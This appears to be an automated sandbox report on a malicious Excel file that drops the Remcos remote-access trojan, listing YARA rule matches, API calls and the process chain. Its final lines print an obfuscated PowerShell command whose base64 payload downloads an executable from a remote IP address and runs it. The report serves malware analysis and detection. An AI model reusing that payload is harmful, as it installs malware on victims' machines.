            Source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 22.2.winiti.exe.143564228.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 11.2.winiti.exe.143fc3ae0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 22.2.winiti.exe.1437c3ae0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 25.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 11.2.winiti.exe.143fc3ae0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 22.2.winiti.exe.1437c3ae0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 11.2.winiti.exe.143d64228.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 22.2.winiti.exe.143564228.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 11.2.winiti.exe.143d64228.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: winiti.exe PID: 3608, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: winiti.exe PID: 4076, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: AddInProcess32.exe PID: 2480, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: csrss[1].exe.7.drStatic PE information: Section: .rsrc ZLIB complexity 0.9982945393041237
            Source: winiti.exe.7.drStatic PE information: Section: .rsrc ZLIB complexity 0.9982945393041237
            Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@29/32@6/5
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 11_2_000000013FDE2A80 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,11_2_000000013FDE2A80
            Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 22_2_000000013F602A80 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,22_2_000000013F602A80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,25_2_00417952
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,25_2_0040F474
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,25_2_0041B4A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 25_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,25_2_0041AA4A
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\37330000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\chrome-E2SMAR
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR95A9.tmpJump to behavior
            Source: Quotation.xlsOLE indicator, Workbook stream: true
            Source: 37330000.0.drOLE indicator, Workbook stream: true
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..1..............P................o.......o.....}..w.............................1......(.P..............3........1..............%..............Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................'.....).Tk....}..w.....%......\.......................(.P.....8.......@.........'.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..1......................................%......}..w.............#g.......Tk......f.....(.P.....8.......@.........1.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................'.....).Tk....}..w.....%......\.......................(.P.....8.......@.........'.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..1......................................%......}..w.............#g.......Tk......f.....(.P.....8.......@.........1.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....x.'.....N.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..#g.......Tk......f.....(.P.....8.......@.......x.'..... .......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..1......................................%......}..w.............#g.......Tk......f.....(.P.....8.......@.........1.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....8.......@.......x.'.....8.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..1......................................%......}..w.............#g.......Tk......f.....(.P.....8.......@.........1.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...@.......x.'.....F.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..1......................................%......}..w.............#g.......Tk......f.....(.P.....8.......@.........1.....l.......................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ........%......}..w.............#g.......Tk......f.....(.P.....8.......@.......x.'.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................%..............0....7...Wn.....}..w......'.....@E......^...............(.P.....8.......@.........'.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................%...................7...Wn.....}..w......'.....@E......^...............(.P.....8.......@.........'.............................Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............................}..w..............D.......D......1D.....(.P.......D......3D.......................{.............
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................#.l....}..w......{.....\.F.......D.............(.P.....P.......X.......................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................{.....}..w............H._.....R .l.....X......(.P.....P.......X.......................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.......................#.l....}..w......{.....\.F.......D.............(.P.....P.......X.......................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................{.....}..w............H._.....R .l.....X......(.P.....P.......X.......................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....H.......N.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.H._.....R .l.....X......(.P.....P.......X.......H....... .......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................{.....}..w............H._.....R .l.....X......(.P.....P.......X.......................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....P.......X.......H.......8.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................{.....}..w............H._.....R .l.....X......(.P.....P.......X.......................................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...X.......H.......F.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................{.....}..w............H._.....R .l.....X......(.P.....P.......X...............l.......................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .........{.....}..w............H._.....R .l.....X......(.P.....P.......X.......H...............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................{.............0...n%...W......}..w............@EE.....^...............(.P.....P.......X.......h...............................
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................{.................n%...W......}..w............@EE.....^...............(.P.....P.......X.......h...............................
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: Quotation.xlsReversingLabs: Detection: 18%
            Source: Quotation.xlsVirustotal: Detection: 24%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
